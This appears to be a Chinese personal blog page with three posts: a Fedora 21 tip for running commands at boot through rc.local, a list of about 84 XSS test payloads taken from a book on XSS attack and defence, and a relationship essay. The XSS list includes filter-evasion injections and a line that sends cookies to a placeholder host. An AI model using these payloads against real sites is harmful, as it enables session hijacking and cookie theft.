fedora21开机执行某命令

发布在 Linux

作为一名手贱党,昨天又把电脑折腾残废了。那就顺便升级成最新的fedora21吧。从18开始,fedora默认rc.local文件不存在,所以需要以root用户执行

1
2
sudo touch /etc/rc.d/rc.local
sudo chmod 755 /etc/rc.d/rc.local

然后编辑这个文件,比如:

1
2
3
#!/bin/sh
mount /dev/sdb1 /mnt/files/
exit 0

重启即可。

评论和分享

xss测试用例

摘录于《XSS跨站脚本攻击剖析与防御》,希望大家支持正版,写的还是不错的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
<script>alert(1);</script>
<script>alert('xss');</script>
<script src="xxx://xxx.xxx"></script>
<script>location.href="xxx://xxx.xx/cookie="+escape(document.cookie)</script>
<scr<script>ipt>alert('xss');</scr<script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=xx.png onerror=alert(/xss/) />
<style>@im\port'\ja\vasc\ript:alert(\"xss\");</style>
<?echo('<scr)';echo('ipt>alert(\"xss\")</script>');?>
<marquee><script>alert('xss')</script></marquee>
<IMG SRC=\"jav&#x09;ascript:alert('xss');\">
<IMG SRC=\"jav&#x0A;ascript:alert('xss');\">
<IMG SRC=\"jav&#x0D;ascript:alert('xss');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"<script>alert(0)</script>
<script src = xxx.xxx.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('xss')\">
<IMG OYNSRC=\"javascript:alert('xss')\">
<font style='color:expression(alert(document.cookie))'>
');alert('xss
<img src="javascript:alert('xss')">
<script language="JavaScript">alert('xss')</script>
[url=javascript:alert('xss');]click me[/url]
<body onunload="javascript:alert('xss');">
<body onLoad="alert('xss');">
[color=red' onmouserover="alert('xss')"]mouser over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("xss");
<div style="x:expression((window.r==1)?"eval('r=1;alert(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?>onload=alert('xss')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>xss</h1></marquee>
'">><marquee><h1>xss</h1></marquee>
'">><script>alert('xss')</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('xss');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('xss');\">
<script>var var = 1:alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('xss')")}</STYLE>
<?='<SCRIPT>alert("xss")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"xss\")'>
"onfocus=alert("xss")"><"
<FRAMESET><FRAME SRC=\"javascript:alert('xss');\"></FRAMESET>
<STYLE>li{list-style-image:url(\"javascript:alert('xss')\");}</SYTLE><UL><LI>XSS
<br size=\"&{alert('xss')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert(1))>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("xss")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('xss');//">
Excute(<MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(1)</script>
<body onLoad="while(true) alert('xss');">
'"></title><script>alert(111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript">alert(x \nS \nS);</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('xss');">
'></script><script>alert(1)</script>
<script+src=">"+src="http://xx.xx/xx.js"></script>
'>"><script src = "xxx.xxx/xss.js"></script>
}</style><script>a=eval;b=alert;a(b(/xss/.source));</script>
<SCRIPT>document.write("xss")</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script>
<body background=javascript:'"><script>alert(1)</script>></body>
">/XaDos/><script>alert(1)</script><script src="xxxx.xxxx/xx.js"></script>
Data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlenQoMTMzNyk8L3NjcmlwdD4=  
上面的解密后   "></title><script>alert(1337)</script> 注意utf-7
"<marquee><img src=x.png onerror=alert(1)/>
'"><marquee><img src=x.png onerror=alert(1)/>
</div><script>alert(1)</script>
"><iframe src='javascript:alert(1)'></iframe>
<div style="background:url('javascript:alert(1)')">
<img src='java\nscript:alert(1)'>
>"'><img src="javascript:alert(1)">
" style="background:url(javascript:alert(/xss/))"
>"><script>alert(/xss/)</script>
"></title><script>alert(1)</script>
'"</title><font color=red onmouseover=javascript:alert(1)>xss</font>
<SELECT NAME="" onmouerover=alert(1)></select>

评论和分享

不可被证明的爱

发布在 哲理美文

文/丛非从

自我价值感低的人,往往需要被证明才能相信自己被爱,而且证明需要持续不断。而恰恰又是这些证明,将爱渐渐淡化。无数在感情里挫败着的人,经历着这样的悲剧故事。

这很像那个笑话,某女不相信自己是被丈夫爱也不相信自己值得被丈夫专一的,所以总是去验证丈夫的专一:每天回来都要搜索丈夫身上有没有女人的头发。直到没有搜到,还是嚎啕大哭,丈夫不解的问到没有搜到女人头发证明我很专一,你还哭个啥。该女的一席话曾让无数人汗颜:你这挨千刀的,在外面居然连尼姑也要了。

笑归笑,这样的故事我们身边又何尝是少数。潜意识里就不相信自己是被爱的,所以总要证明自己是被爱的,或者证明自己是被爱的。前者的故事很多,某个女孩偶然间知道男友的密码是自己的生日,欣喜若狂,证明了自己是被爱的,然后通过追问需要进一步证明:你是什么时候设的啊。对方答忘了。大约几月呢。对方答忘了。是年前呢还是年后呢……面对这样的追问,不知道听的人会有什么感受。当问的人不能持续证明到自己是被爱的,就开始失落:他是不是不爱我了。后者的故事也很有趣:当我故意关机2个小时,你知道我这段时间关机并且着急才能证明你是爱我的。我手机停机了你主动给我交话费才是爱我的,我过生日你主动记得我生日而且给我买玫瑰花才是爱我的。只有你做了XX,你才是爱我的,如果你没做XX,证明你不是真心爱我。当然,他们的话术常常不是这样,而是:你爱我,就应该……。例如你爱我,就应该每天给我打一个电话。还有更省略的:恋爱不就应该天天联系吗?恋爱不就应该彼此分享所有故事吗?

爱总是需要被证明,才相信爱。如果有一次不能被证明,则就会陷入恐慌。

阅读全文
  • 第 1 页 共 1 页
作者的图片

Roy

微信公众号:hi-roy


野生程序猿


China